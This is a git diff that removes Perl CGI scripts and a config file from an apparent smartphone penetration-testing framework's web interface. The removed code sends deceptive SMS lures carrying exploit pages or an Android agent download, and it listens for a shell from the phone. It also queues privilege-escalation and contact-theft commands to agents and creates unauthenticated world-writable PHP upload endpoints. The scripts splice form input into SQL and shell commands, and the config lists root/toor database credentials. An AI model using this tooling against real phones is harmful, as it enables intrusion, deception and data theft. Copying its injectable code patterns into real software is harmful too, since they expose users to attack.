- $password = $Variables{"MYSQLPASS"};
- $port = $Variables{"MYSQLPORT"};
- $type = $Variables{"DATABASETYPE"};
- if ($type eq "postgres")
- {
- $dbh = DBI->connect("DBI:Pg:dbname=framework;host=$sqlserver",$username,$password);
- }
- elsif ($type eq "mysql")
- {
- $dbh = DBI->connect("dbi:mysql:database=framework;host=$sqlserver;port=$port", $username,$password);
- }
- $pathquery = "SELECT path from modems where id=" . $modem;
- $sql = $dbh->prepare($pathquery);
- $results = $sql->execute;
- @rows = $sql->fetchrow_array();
- $path2 = @rows[0];
- $keyquery = "SELECT controlkey from modems where id=" . $modem;
- $sql = $dbh->prepare($keyquery);
- $results2 = $sql->execute;
- @rows = $sql->fetchrow_array();
- $key2 = @rows[0];
- $control = $webserver . $path2 . "/getfunc";
- open(CONTROLFILE, ">$control");
- $command2 = $key2 . " " . "SEND" . " " . $number . " " . "This is a cool page: " . $link;
- print CONTROLFILE $command2;
- close(CONTROLFILE);
- $vulnerable = "no";
- $socket = new IO::Socket::INET (LocalHost => $shellipaddress, LocalPort => '12345', Proto => 'tcp' , Listen => 1, Reuse => 1, Timeout=> 180);
- if ($data_socket = $socket->accept())
- {
- $data="/system/bin/id\n";
- print $data_socket $data;
- $data=<$data_socket>;
- print $data;
- close($data_socket);
- $vulnerable = "yes";
- }
-
-
-
-$table = "client";
- $sqlserver = $Variables{"MYSQLSERVER"};
- $username = $Variables{"MYSQLUSER"};
- $password = $Variables{"MYSQLPASS"};
- $port = $Variables{"MYSQLPORT"};
- $type = $Variables{"DATABASETYPE"};
- if ($type eq "postgres")
- {
- $dbh = DBI->connect("DBI:Pg:dbname=framework;host=$sqlserver",$username,$password);
- $number2 = "\'" . $number . "\'";
- $vulnerable2 = "\'" . $vulnerable . "\'";
- $webkit = "\'" . "webkit" . "\'";
-
- }
- elsif ($type eq "mysql")
- {
- $dbh = DBI->connect("dbi:mysql:database=framework;host=$sqlserver;port=$port", $username,$password);
- $number2 = "\"" . $number . "\"";
- $vulnerable2 = "\"" . $vulnerable . "\"";
- $webkit = "\"" . "webkit" . "\"";
- }
- $insertquery = "INSERT INTO $table (id,number,exploit,vuln) VALUES (DEFAULT,$number2,$webkit,$vulnerable2)";
- $sql = $dbh->prepare($insertquery);
- $sql->execute;
View
145 frameworkgui/attach2Agents.pl
@@ -1,145 +0,0 @@
-#!/usr/bin/perl
-use DBI;
-use Cwd;
-
-# Read the standard input (sent by the form):
-read(STDIN, $FormData, $ENV{'CONTENT_LENGTH'});
-# Get the name and value for each form input:
-@pairs = split(/&/, $FormData);
-# Then for each name/value pair....
-foreach $pair (@pairs) {
- # Separate the name and value:
- ($name, $value) = split(/=/, $pair);
- # Convert + signs to spaces:
- $value =~ tr/+/ /;
- # Convert hex pairs (%HH) to ASCII characters:
- $value =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;
- # Store values in a hash called %FORM:
- $FORM{$name} = $value;
-}
-
-
-$number1 = $FORM{"agentPhNo"};
-$number21 = $FORM{"controlPhNo"};
-$path1 = $FORM{"agentURLPath"};
-$key1 = $FORM{"agentControlKey"};
-$platform1 = $FORM{"platformDD1"};
-
-##----- put your code here
- $dir = getcwd;
-$configfile = $dir . "/config";
-open(CONFIG, "+<$configfile");
-while (<CONFIG>)
-{
- chomp;
- s/#.*//;
- s/^\s+//;
- s/\s+$//;
- ($var, $value) = split(/\s*=\s*/, $_, 2);
- $Variables{$var} = ${value};
-}
-$Variables{"OS"} = $^O;
- $webserver = $Variables{"WEBSERVER"};
- $fullpath = $webserver. $path;
- $command1 = "mkdir " . $fullpath;
- system($command1);
- $controlfile = $fullpath . "/control";
- $command2 = "touch " . $controlfile;
- system($command2);
- $command3 = "chmod 777 " . $controlfile;
- system($command3);
- $picturefile = $fullpath . "/picture.jpg";
- $command4 = "touch " . $picturefile;
- system($command4);
- $command5 = "chmod 777 " . $picturefile;
- system($command5);
- $textfile = $fullpath . "/text.txt";
- $command6 = "touch " . $textfile;
- system($command6);
- $command7 = "chmod 777 " . $textfile;
- system($command7);
- $pictureupload = $fullpath . "/pictureupload.php";
- $command8 = "touch " . $pictureupload;
- system($command8);
- $command9 = "chmod 777 " . $pictureupload;
- system($command9);
- $pictureuploadtext = "<?php\n\$base=\$_REQUEST['picture'];\necho \$base;\n\$binary=base64_decode(\$base);\nheader('Content-Type: bitmap; charset=utf-8');\n\$file = fopen('picture.jpg', 'wb');\nfwrite(\$file, \$binary);\nfclose(\$file);\n?>";
- open(PICFILE, ">$pictureupload");
- print PICFILE $pictureuploadtext;
- close(PICFILE);
- $textupload = $fullpath . "/textuploader.php";
- $command10 = "touch " . $textupload;
- system($command10);
- $command11 = "chmod 777 " . $textupload;
- system($command11);
- $textuploadtext = "<?php\n\$base=\$_REQUEST['text'];\nheader('Content-Type: text; charset=utf-8');\n\$file = fopen('text.txt', 'wb');\nfwrite(\$file, \$base);\n?>";
- open(TEXTFILE, ">$textupload");
- print TEXTFILE $textuploadtext;
- close(TEXTFILE);
- $controlupload = $fullpath . "/controluploader.php";
- $command12 = "touch " . $controlupload;
- system($command12);
- $command13 = "chmod 777 " . $controlupload;
- system($command13);
- $controluploadtext = "<?php\n\$base=\$_REQUEST['text'];\nheader('Content-Type: text; charset=utf-8');\n\$file = fopen('control','wb');\nfwrite(\$file, \$base);\n?>";
- open(CONTROLFILE, ">$controlupload");
- print CONTROLFILE $controluploadtext;
- close(CONTROLFILE);
- $putfile = $fullpath . "/putfunc";
- $command14 = "touch " . $putfile;
- system($command14);
- $command15 = "chmod 777 " . $putfile;
- system($command15);
- $table = "agents";
- $table2 = "data";
- $sqlserver = $Variables{"MYSQLSERVER"};
- $username = $Variables{"MYSQLUSER"};
- $password = $Variables{"MYSQLPASS"};
- $port = $Variables{"MYSQLPORT"};
- $type = $Variables{"DATABASETYPE"};
- if ($type eq "postgres")
- {
- $dbh = DBI->connect("DBI:Pg:dbname=framework;host=$sqlserver",$username,$password);
- $number2 = "\'" . $number1 . "\'";
- $path2 = "\'" . $path1 . "\'";
- $key2 = "\'" . $key1 . "\'";
- $controlnumber2 = "\'" . $number21 . "\'";
- $platform2 = "\'" . $platform1 . "\'";
- $query2 = "SELECT id from agents where number=" . "\'" . $number1 . "\'";
-
-
- }
- elsif ($type eq "mysql")
- {
- $dbh = DBI->connect("dbi:mysql:database=framework;host=$sqlserver;port=$port", $username,$password);
- $number2 = "\"" . $number1 . "\"";
- $path2 = "\"" . $path1 . "\"";
- $key2 = "\"" . $key1 . "\"";
- $controlnumber2 = "\"" . $number21 . "\"";
- $platform2 = "\"" . $platform1 . "\"";
- $query2 = "SELECT id from agents where number=" . $number1;
-
- }
-
- $insertquery = "INSERT INTO $table (id,number,path,controlkey,controlnumber,platform) VALUES (DEFAULT,$number2,$path2,$key2,$controlnumber2,$platform2)";
- $insertquery2 = "INSERT INTO $table2 (id,sms,contacts,picture,root) VALUES (DEFAULT, NULL, NULL, NULL, NULL)";
- $sql = $dbh->prepare($insertquery);
- $sql->execute;
- $sql2 = $dbh->prepare($insertquery2);
- $sql2->execute;
- $sql = $dbh->prepare($query2);
- $idblah = $sql->execute;
- @rows = $sql->fetchrow_array();
- $id = @rows[0];
- $startcommand = "perl agentpoll.pl " . $path1 . " " . $key1 . " " . $id;
- $pid = fork;
- die "fork failed" unless defined $pid;
- if ($pid ==0)
- {
- system($startcommand);
- }
-
-##----- end of your code
-
-my $url = "menu.pl";
-print "Location: $url\n\n";
View
193 frameworkgui/attachMobileModem.pl
@@ -1,193 +0,0 @@
-#!/usr/bin/perl
-use Cwd;
-use DBI;
-# Read the standard input (sent by the form):
-read(STDIN, $FormData, $ENV{'CONTENT_LENGTH'});
-# Get the name and value for each form input:
-@pairs = split(/&/, $FormData);
-# Then for each name/value pair....
-foreach $pair (@pairs) {
- # Separate the name and value:
- ($name, $value) = split(/=/, $pair);
- # Convert + signs to spaces:
- $value =~ tr/+/ /;
- # Convert hex pairs (%HH) to ASCII characters:
- $value =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;
- # Store values in a hash called %FORM:
- $FORM{$name} = $value;
-}
-
-
-$number = $FORM{"modemPhoneNo"};
-$key = $FORM{"controlKey"};
-$path = $FORM{"appURLPath"};
-
-
-##----- put your code here
-$dir = getcwd;
-$configfile = $dir . "/config";
-open(CONFIG, "+<$configfile");
-while (<CONFIG>)
-{
- chomp;
- s/#.*//;
- s/^\s+//;
- s/\s+$//;
- ($var, $value) = split(/\s*=\s*/, $_, 2);
- $Variables{$var} = ${value};
-}
-$Variables{"OS"} = $^O;
-#print "Content-type: text/html\r\n\r\n";
-#print "Connect Smartphone App";
- $webserver = $Variables{WEBSERVER};
- $fullpath = $webserver. $path;
- $type = "app";
- $number2 = "\"" . $number . "\"";
- $path2 = "\"" . $path . "\"";
- $key2 = "\"" . $key . "\"";
- $type2 = "\"" . $type . "\"";
- $command1 = "mkdir " . $fullpath;
- system($command1);
- $connectfile = $fullpath . "/connect";
- $command2 = "touch " . $connectfile;
- system($command2);
- $command3 = "chmod 777 " . $connectfile;
- system($command3);
- $picturefile = $fullpath . "/picture.jpg";
- $command4 = "touch " . $picturefile;
- system($command4);
- $command5 = "chmod 777 " . $picturefile;
- system($command5);
- $textfile = $fullpath . "/text.txt";
- $command6 = "touch " . $textfile;
- system($command6);
- $command7 = "chmod 777 " . $textfile;
- system($command7);
- $textfile2 = $fullpath . "/text2.txt";
- $command77 = "touch ". $textfile2;
- system($command77);
- $command7777 = "chmod 777 " . $textfile2;
- system($command7777);
- $pictureupload = $fullpath . "/pictureupload.php";
- $command8 = "touch " . $pictureupload;
- system($command8);
- $command9 = "chmod 777 " . $pictureupload;
- system($command9);
- $pictureuploadtext = "<?php\n\$base=\$_REQUEST['picture'];\necho \$base;\n\$binary=base64_decode(\$base);\nheader('Content-Type: bitmap; charset=utf-8');\n\$file = fopen('picture.jpg', 'wb');\nfwrite(\$file, \$binary);\nfclose(\$file);\n?>";
- open(PICFILE, ">$pictureupload");
- print PICFILE $pictureuploadtext;
- close(PICFILE);
- $textupload = $fullpath . "/textuploader.php";
- $command10 = "touch " . $textupload;
- system($command10);
- $command11 = "chmod 777 " . $textupload;
- system($command11);
- $textuploadtext = "<?php\n\$base=\$_REQUEST['text'];\nheader('Content-Type: text; charset=utf-8');\n\$file = fopen('text.txt', 'wb');\nfwrite(\$file, \$base);\n?>";
- open(TEXTFILE, ">$textupload");
- print TEXTFILE $textuploadtext;
- close(TEXTFILE);
- $text2upload = $fullpath . "/text2uploader.php";
- $command100 = "touch " . $text2upload;
- system($command100);
- $command110 = "chmod 777 " . $text2upload;
- system($command110);
- $text2uploadtext = "<?php\n\$base=\$_REQUEST['text'];\nheader('Content-Type: text; charset=utf-8');\n\$file = fopen('text2.txt', 'wb');\nfwrite(\$file, \$base);\n?>";
- open(TEXT2FILE, ">$text2upload");
- print TEXT2FILE $text2uploadtext;
- close(TEXT2FILE);
- $connectupload = $fullpath . "/connectuploader.php";
- $command12 = "touch " . $connectupload;
- system($command12);
- $command13 = "chmod 777 " . $connectupload;
- system($command13);
- $connectuploadtext = "<?php\n\$base=\$_REQUEST['text'];\nheader('Content-Type: text; charset=utf-8');\n\$file = fopen('connect','wb');\nfwrite(\$file, \$base);\n?>";
- open(CONNECTFILE, ">$connectupload");
- print CONNECTFILE $connectuploadtext;
- close(CONNECTFILE);
- $getfuncfile = $fullpath . "/getfunc";
- $command6 = "touch " . $getfuncfile;
- system($command6);
- $command7 = "chmod 777 " . $getfuncfile;
- system($command7);
- $putfuncfile = $fullpath . "/putfunc";
- $command6 = "touch " . $putfuncfile;
- system($command6);
- $command7 = "chmod 777 " . $putfuncfile;
- system($command7);
- $getfuncupload = $fullpath . "/getfuncuploader.php";
- $command10 = "touch " . $getfuncupload;
- system($command10);
- $command11 = "chmod 777 " . $getfuncupload;
- system($command11);
- $getfuncuploadtext = "<?php\n\$base=\$_REQUEST['text'];\nheader('Content-Type: text; charset=utf-8');\n\$file = fopen('getfunc', 'wb');\nfwrite(\$file, \$base);\n?>";
- open(GETFUNCUPLOADFILE, ">$getfuncupload");
- print GETFUNCUPLOADFILE $getfuncuploadtext;
- close(GETFUNCUPLOADFILE);
- $putfuncupload = $fullpath . "/putfuncuploader.php";
- $command10 = "touch " . $putfuncupload;
- system($command10);
- $command11 = "chmod 777 " . $putfuncupload;
- system($command11);
- $putfuncuploadtext = "<?php\n\$base=\$_REQUEST['text'];\nheader('Content-Type: text; charset=utf-8');\n\$file = fopen('putfunc', 'wb');\nfwrite(\$file, \$base);\n?>";
- open(PUTFUNCUPLOADFILE, ">$putfuncupload");
- print PUTFUNCUPLOADFILE $putfuncuploadtext;
- close(PUTFUNCUPLOADFILE);
- while(1){
- $fullpath1 = $webserver. $path . "/connect";
- open(CONNECTFILE, "+<$fullpath1");
- $line= <CONNECTFILE>;
- $correctstring = $key . " CONNECT";
- if ($line eq $correctstring)
- {
- $command = "\n" . $key . " CONNECTED";
- print CONNECTFILE $command;
- close(CONNECTFILE);
- # print "CONNECTED!\n";
- last;
- }
- else {
- close(CONNECTFILE);
- # sleep(1);
- }
- }
- $table = "modems";
- $modemtype = "app";
- $sqlserver = $Variables{"MYSQLSERVER"};
- $username = $Variables{"MYSQLUSER"};
- $password = $Variables{"MYSQLPASS"};
- $port = $Variables{"MYSQLPORT"};
- $type = $Variables{"DATABASETYPE"};
- if ($type eq "postgres")
- {
- $dbh = DBI->connect("DBI:Pg:dbname=framework;host=$sqlserver",$username,$password);
- $number2 = "\'" . $number . "\'";
- $path2 = "\'" . $path . "\'";
- $key2 = "\'" . $key . "\'";
- $type2 = "\'" . $modemtype . "\'";
-
- }
- elsif ($type eq "mysql")
- {
- $dbh = DBI->connect("dbi:mysql:database=framework;host=$sqlserver;port=$port", $username,$password);
- $number2 = "\"" . $number . "\"";
- $path2 = "\"" . $path . "\"";
- $key2 = "\"" . $key . "\"";
- $type2 = "\"" . $modemtype . "\"";
- }
- $insertquery = "INSERT INTO $table (id,number,path,controlkey,type) VALUES (DEFAULT,$number2,$path2,$key2, $type2)";
- $sql = $dbh->prepare($insertquery);
- $sql->execute;
- $startcommand = "perl poller.pl " . $path . " " . $key;
- $pid = fork;
- die "fork failed" unless defined $pid;
- if ($pid ==0)
- {
- system($startcommand);
- }
-
-
-
-##----- end of your code
-
-my $url = "menu.pl";
-print "Location: $url\n\n";
View
BIN frameworkgui/bulb.jpg
Deleted file not rendered
View
21 frameworkgui/config
@@ -1,21 +0,0 @@
-#SMARTPHONE PENTEST FRAMEWORK CONFIG FILE
-#ROOT DIRECTORY FOR THE WEBSERVER THAT WILL HOST OUR FILES
-WEBSERVER = /var/www
-#IPADDRESS FOR WEBSERVER (webserver needs to be listening on this address)
-IPADDRESS = 192.168.20.33
-#IP ADDRESS TO LISTEN ON FOR SHELLS
-SHELLIPADDRESS = 192.168.20.33
-#IP ADDRESS OF SQLSERVER 127.0.0.1 IF LOCALHOST
-MYSQLSERVER = 127.0.0.1
-#DATABASE TYPE (Mysql of Postgresql)
-DATABASETYPE = mysql
-#USERNAME OF THE MYSQL USER TO USE
-MYSQLUSER = root
-#PASSWORD OF THE MYSQL USER TO USE
-MYSQLPASS = toor
-#PORT MYSQL IS RUNNING ON (3306 IS DEFAULT)
-MYSQLPORT = 3306
-#LOCATION OF ANDROID APK FOR AGENT DROP
-ANDROIDAGENT = /var/www/frameworkgui/AndroidAgent.apk
-#LOCATION OF IPHONE DEB FOR AGENT DROP
-IPHONEAGENT = /var/www/frameworkgui/iphone.deb
View
74 frameworkgui/createDatabase.pl
@@ -1,74 +0,0 @@
-#!/usr/bin/perl
-use DBI;
-use Cwd;
-$dir = getcwd;
-$configfile = $dir . "/config";
- open(CONFIG, "+<$configfile");
-while (<CONFIG>)
-{
- chomp;
- s/#.*//;
- s/^\s+//;
- s/\s+$//;
- ($var, $value) = split(/\s*=\s*/, $_, 2);
- $Variables{$var} = ${value};
-}
-$Variables{"OS"} = $^O;
-
- $sqlserver = $Variables{"MYSQLSERVER"};
- $username = $Variables{"MYSQLUSER"};
- $password = $Variables{"MYSQLPASS"};
- $port = $Variables{"MYSQLPORT"};
- $type = $Variables{"DATABASETYPE"};
-
- $dropquery1 = "DROP TABLE IF EXISTS agents";
- $dropquery2 = "DROP TABLE IF EXISTS data";
- $dropquery3 = "DROP TABLE IF EXISTS modems";
- $dropquery4 = "DROP TABLE IF EXISTS remote";
- $dropquery5 = "DROP TABLE IF EXISTS client";
- if ($type eq "postgres")
- {
- $dbh = DBI->connect("DBI:Pg:dbname=framework;host=$sqlserver","$username","$password");
- $createquery1 = "create table agents (id SERIAL NOT NULL PRIMARY KEY, number varchar(12),path varchar(1000), controlkey varchar(7), controlnumber varchar(12), platform varchar(12))"
-;
- $createquery2 = "create table data (id SERIAL NOT NULL PRIMARY KEY, sms varchar(2000),contacts varchar(1000), picture varchar(100), root varchar(5))";
- $createquery3 = "create table modems (id SERIAL NOT NULL PRIMARY KEY, number varchar(12), path varchar(1000), controlkey varchar(7), type varchar(3))";
- $createquery4 = "create table remote (id SERIAL NOT NULL PRIMARY KEY, ip varchar(15), exploit varchar(200), vuln varchar(3), agent varchar(3))";
- $createquery5 = "create table client (id SERIAL NOT NULL PRIMARY KEY, number varchar(12), exploit varchar(200), vuln varchar(3))";
-
- }
- elsif ($type eq "mysql")
- {
- $createquery1 = "create table agents (id INT NOT NULL AUTO_INCREMENT PRIMARY KEY, number varchar(12),path varchar(1000), controlkey varchar(7), controlnumber varchar(12), platform varchar(12))";
- $createquery2 = "create table data (id INT NOT NULL AUTO_INCREMENT PRIMARY KEY, sms varchar(2000),contacts varchar(1000), picture varchar(100), root varchar(5))";
- $createquery3 = "create table modems (id INT NOT NULL AUTO_INCREMENT PRIMARY KEY, number varchar(12), path varchar(1000), controlkey varchar(7), type varchar(3))";
- $createquery4 = "create table remote (id INT NOT NULL AUTO_INCREMENT PRIMARY KEY, ip varchar(15), exploit varchar(200), vuln varchar(3), agent varchar(3))";
- $createquery5 = "create table client (id INT NOT NULL AUTO_INCREMENT PRIMARY KEY, number varchar(12), exploit varchar(200), vuln varchar(3))";
- $dbh = DBI->connect("dbi:mysql:database=framework;host=$sqlserver;port=$port", $username,$password);
- }
-
- $sql = $dbh->prepare($dropquery1);
- $sql->execute;
- $sql = $dbh->prepare($dropquery2);
- $sql->execute;
- $sql = $dbh->prepare($dropquery3);
- $sql->execute;
- $sql = $dbh->prepare($dropquery4);
- $sql->execute;
- $sql = $dbh->prepare($dropquery5);
- $sql->execute;
- $sql = $dbh->prepare($createquery1);
- $sql->execute;
- $sql = $dbh->prepare($createquery2);
- $sql->execute;
- $sql = $dbh->prepare($createquery3);
- $sql->execute;
- $sql = $dbh->prepare($createquery4);
- $sql->execute;
- $sql = $dbh->prepare($createquery5);
- $sql->execute;
-#####This sends it back to the main page.
-
-my $url = "menu.pl";
-print "Location: $url\n\n";
-
View
65 frameworkgui/directdownload.pl
@@ -1,65 +0,0 @@
-#!/usr/bin/perl
-use Cwd;
-use DBI;
-$dir = getcwd;
-$configfile = $dir . "/config";
-open(CONFIG, "+<$configfile");
-while (<CONFIG>)
-{
- chomp;
- s/#.*//;
- s/^\s+//;
- s/\s+$//;
- ($var, $value) = split(/\s*=\s*/, $_, 2);
- $Variables{$var} = ${value};
-}
-$webserver = $Variables{"WEBSERVER"};
- $sqlserver = $Variables{"MYSQLSERVER"};
- $ipaddress = $Variables{"IPADDRESS"};
-$path = $ARGV[0];
- $filename = $ARGV[1];
- $number = $ARGV[2];
-$platform = $ARGV[3];
-$modem = $ARGV[4];
-chomp($platform);
-if ($platform eq "android")
-{
-$link = "http://" . $ipaddress . $path . $filename;
- $fullpath = $webserver. $path;
- $command1 = "mkdir " . $fullpath;
- system($command1);
- $location = $Variables{"ANDROIDAGENT"};
-
- $command = "cp " . $location . " " . $webserver . $path . $filename;
- system($command);
-
-
- $username = $Variables{"MYSQLUSER"};
- $password = $Variables{"MYSQLPASS"};
- $port = $Variables{"MYSQLPORT"};
- $type = $Variables{"DATABASETYPE"};
- if ($type eq "postgres")
- {
- $dbh = DBI->connect("DBI:Pg:dbname=framework;host=$sqlserver",$username,$password);
- }
- elsif ($type eq "mysql")
- {
- $dbh = DBI->connect("dbi:mysql:database=framework;host=$sqlserver;port=$port", $username,$password);
- }
-
- $pathquery = "SELECT path from modems where id=" . $modem;
- $sql = $dbh->prepare($pathquery);
- $results = $sql->execute;
- @rows = $sql->fetchrow_array();
- $path2 = @rows[0];
- $keyquery = "SELECT controlkey from modems where id=" . $modem;
- $sql = $dbh->prepare($keyquery);
- $results2 = $sql->execute;
- @rows = $sql->fetchrow_array();
- $key2 = @rows[0];
- $control = $webserver . $path2 . "/getfunc";
- open(CONTROLFILE, ">$control");
- $command2 = $key2 . " " . "SEND" . " " . $number . " " . "This is a cool app: " . $link;
- print CONTROLFILE $command2;
- close(CONTROLFILE);
-}
View
105 frameworkgui/escalatePrivileges.pl
@@ -1,105 +0,0 @@
-#!/usr/bin/perl
-use Cwd;
-use DBI;
-
-# Read the standard input (sent by the form):
-read(STDIN, $FormData, $ENV{'CONTENT_LENGTH'});
-# Get the name and value for each form input:
-@pairs = split(/&/, $FormData);
-# Then for each name/value pair....
-foreach $pair (@pairs) {
- # Separate the name and value:
- ($name, $value) = split(/=/, $pair);
- # Convert + signs to spaces:
- $value =~ tr/+/ /;
- # Convert hex pairs (%HH) to ASCII characters:
- $value =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;
- # Store values in a hash called %FORM:
- $FORM{$name} = $value;
-}
-
-
-$agent = $FORM{"agentsDD"};
-$delivery = $FORM{"deliveryMethodRB"};
-$modemNo = $FORM{"modemNoDD"};
-
-
-
-
-
-##----- put your code here
-$dir = getcwd;
-$configfile = $dir . "/config";
-open(CONFIG, "+<$configfile");
-while (<CONFIG>)
-{
- chomp;
- s/#.*//;
- s/^\s+//;
- s/\s+$//;
- ($var, $value) = split(/\s*=\s*/, $_, 2);
- $Variables{$var} = ${value};
-}
-#print "Content-type: text/html\r\n\r\n";
-$webserver = $Variables{"WEBSERVER"};
-
-$Variables{"OS"} = $^O;
- $sqlserver = $Variables{"MYSQLSERVER"};
- $username = $Variables{"MYSQLUSER"};
- $password = $Variables{"MYSQLPASS"};
- $port = $Variables{"MYSQLPORT"};
- $type = $Variables{"DATABASETYPE"};
- if ($type eq "postgres")
- {
- $dbh = DBI->connect("DBI:Pg:dbname=framework;host=$sqlserver",$username,$password);
- $selectquery = "SELECT path from agents where number=" . "\'" . $agent . "\'";
- $selectquery2 = "SELECT controlkey from agents where number=" . "\'" . $agent . "\'";
- $selectquery3 = "SELECT id from modems where number=" . "\'" . $modemNo . "\'";
- }
- elsif ($type eq "mysql")
- {
- $dbh = DBI->connect("dbi:mysql:database=framework;host=$sqlserver;port=$port", $username,$password);
- $selectquery = "SELECT path from agents where number=" . $agent;
- $selectquery2 = "SELECT controlkey from agents where number=" . $agent;
- $selectquery3 = "SELECT id from modems where number=" . $modemNo;
- }
-
- $sql = $dbh->prepare($selectquery);
- $results = $sql->execute;
- @rows = $sql->fetchrow_array();
- $path = @rows[0];
- $sql = $dbh->prepare($selectquery2);
- $results = $sql->execute;
- @rows = $sql->fetchrow_array();
- $key = @rows[0];
-if ($delivery eq "HTTP")
- {
- $command = $key . " ROOT HTTP\n";
- $control = $webserver . $path . "/putfunc";
- open(CONTROLFILE, ">>$control");
- print CONTROLFILE $command;
- close(CONTROLFILE);
-
- }
- if ($delivery eq "SMS")
- {
-
- $sql = $dbh->prepare($selectquery3);
- $results = $sql->execute;
- @rows = $sql->fetchrow_array();
- $modem = @rows[0];
- $command = $key . " " . "ROOT HTTP" . " " . $modem . "\n";
- $control = $webserver . $path . "/putfunc";
- open(CONTROLFILE, ">>$control");
- print CONTROLFILE $command;
- close(CONTROLFILE);
-
-}
-##----- end of your code
-
-my $url = "menu.pl";
-print "Location: $url\n\n";
-
-
-
-
View
151 frameworkgui/getContacts.pl
@@ -1,151 +0,0 @@
-#!/usr/bin/perl
-use DBI;
-use Cwd;
-
-# Read the standard input (sent by the form):
-read(STDIN, $FormData, $ENV{'CONTENT_LENGTH'});
-# Get the name and value for each form input:
-@pairs = split(/&/, $FormData);
-# Then for each name/value pair....
-foreach $pair (@pairs) {
- # Separate the name and value:
- ($name, $value) = split(/=/, $pair);
- # Convert + signs to spaces:
- $value =~ tr/+/ /;
- # Convert hex pairs (%HH) to ASCII characters:
- $value =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;
- # Store values in a hash called %FORM:
- $FORM{$name} = $value;
-}
-
-
-$agent = $FORM{"agentsDD"};
-$deliverymethod = $FORM{"deliveryMethodRB"};
-$returnmethod = $FORM{"returnMethodRB"};
-$modemNo = $FORM{"modemNoDD"};
-
-
-
-##----- put your code here
-$dir = getcwd;
-$configfile = $dir . "/config";
-open(CONFIG, "+<$configfile");
-while (<CONFIG>)
-{
- chomp;
- s/#.*//;
- s/^\s+//;
- s/\s+$//;
- ($var, $value) = split(/\s*=\s*/, $_, 2);
- $Variables{$var} = ${value};
-}
-#print "Content-type: text/html\r\n\r\n";
-$webserver = $Variables{"WEBSERVER"};
-
-$Variables{"OS"} = $^O;
- $sqlserver = $Variables{"MYSQLSERVER"};
- $username = $Variables{"MYSQLUSER"};
- $password = $Variables{"MYSQLPASS"};
- $port = $Variables{"MYSQLPORT"};
- $type = $Variables{"DATABASETYPE"};
- if ($type eq "postgres")
- {
- $dbh = DBI->connect("DBI:Pg:dbname=framework;host=$sqlserver",$username,$password);
- $selectquery = "SELECT path from agents where number=" . "\'" . $agent . "\'";
- $selectquery2 = "SELECT controlkey from agents where number=" . "\'" . $agent . "\'";
- $selectquery3 = "SELECT id from modems where number=" . "\'" . $modemNo . "\'";
-
-
- }
- elsif ($type eq "mysql")
- {
- $dbh = DBI->connect("dbi:mysql:database=framework;host=$sqlserver;port=$port", $username,$password);
- $selectquery = "SELECT path from agents where number=" . $agent;
- $selectquery2 = "SELECT controlkey from agents where number=" . $agent;
- $selectquery3 = "SELECT id from modems where number=" . $modemNo;
-
-
- }
-
- $sql = $dbh->prepare($selectquery);
- $results = $sql->execute;
- @rows = $sql->fetchrow_array();
- $path = @rows[0];
- $sql = $dbh->prepare($selectquery2);
- $results = $sql->execute;
- @rows = $sql->fetchrow_array();
- $key = @rows[0];
-if ($returnmethod eq "SMS")
- {
-
- $sql = $dbh->prepare($selectquery3);
- $results = $sql->execute;
- @rows = $sql->fetchrow_array();
- $modem = @rows[0];
- if ($deliverymethod eq "HTTP")
- {
- $command = $key . " CONT " . $deliverymethod . " " . $returnmethod . " " . $modem . "\n";
- $control = $webserver . $path . "/putfunc";
- open(CONTROLFILE, ">>$control");
- print CONTROLFILE $command;
- close(CONTROLFILE);
-
-
-
- }
- if ($deliverymethod eq "SMS")
- {
- $sql = $dbh->prepare($selectquery3);
- $results = $sql->execute;
- @rows = $sql->fetchrow_array();
- $modem = @rows[0];
- $command = $key . " CONT " . $deliverymethod . " " . $returnmethod . " " . $modem . "\n";
- $control = $webserver . $path . "/putfunc";
- open(CONTROLFILE, ">>$control");
- print CONTROLFILE $command;
- close(CONTROLFILE);
-
- }
- }
-
-
- if ($returnmethod eq "HTTP")
- {
-
- if ($deliverymethod eq "HTTP")
- {
- $command = $key . " CONT " . $deliverymethod . " " . $returnmethod . "\n";
- $control = $webserver . $path . "/putfunc";
- open(CONTROLFILE, ">>$control");
- print CONTROLFILE $command;
- close(CONTROLFILE);
-
-
- }
- if ($deliverymethod eq "SMS")
- {
-
- $sql = $dbh->prepare($selectquery3);
- $results = $sql->execute;
- @rows = $sql->fetchrow_array();
- $modem = @rows[0];
- $command = $key . " CONT " . $deliverymethod . " " . $returnmethod . " " . $modem . "\n";
- $control = $webserver . $path . "/putfunc";
- open(CONTROLFILE, ">>$control");
- print CONTROLFILE $command;
- close(CONTROLFILE);
-
-
-
- }
-
- }
-
-
-
-
-##----- end of your code
-
-my $url = "menu.pl";
-print "Location: $url\n\n";
-
View
137 frameworkgui/getDatabase.pl
@@ -1,137 +0,0 @@
-#!/usr/bin/perl
-use DBI;
-use Cwd;
-
-# Read the standard input (sent by the form):
-read(STDIN, $FormData, $ENV{'CONTENT_LENGTH'});
-# Get the name and value for each form input:
-@pairs = split(/&/, $FormData);
-# Then for each name/value pair....
-foreach $pair (@pairs) {
- # Separate the name and value:
- ($name, $value) = split(/=/, $pair);
- # Convert + signs to spaces:
- $value =~ tr/+/ /;
- # Convert hex pairs (%HH) to ASCII characters:
- $value =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;
- # Store values in a hash called %FORM:
- $FORM{$name} = $value;
-}
-
-
-$agent = $FORM{"agentsDD"};
-$deliverymethod = $FORM{"deliveryMethodRB"};
-$returnmethod = $FORM{"returnMethodRB"};
-$modemNo = $FORM{"modemNoDD"};
-
-
-
-##----- put your code here
-$dir = getcwd;
-$configfile = $dir . "/config";
-open(CONFIG, "+<$configfile");
-while (<CONFIG>)
-{
- chomp;
- s/#.*//;
- s/^\s+//;
- s/\s+$//;
- ($var, $value) = split(/\s*=\s*/, $_, 2);
- $Variables{$var} = ${value};
-}
-#print "Content-type: text/html\r\n\r\n";
-$webserver = $Variables{"WEBSERVER"};
-
-$Variables{"OS"} = $^O;
- $sqlserver = $Variables{"MYSQLSERVER"};
- $username = $Variables{"MYSQLUSER"};
- $password = $Variables{"MYSQLPASS"};
- $port = $Variables{"MYSQLPORT"};
- $type = $Variables{"DATABASETYPE"};
- if ($type eq "postgres")
- {
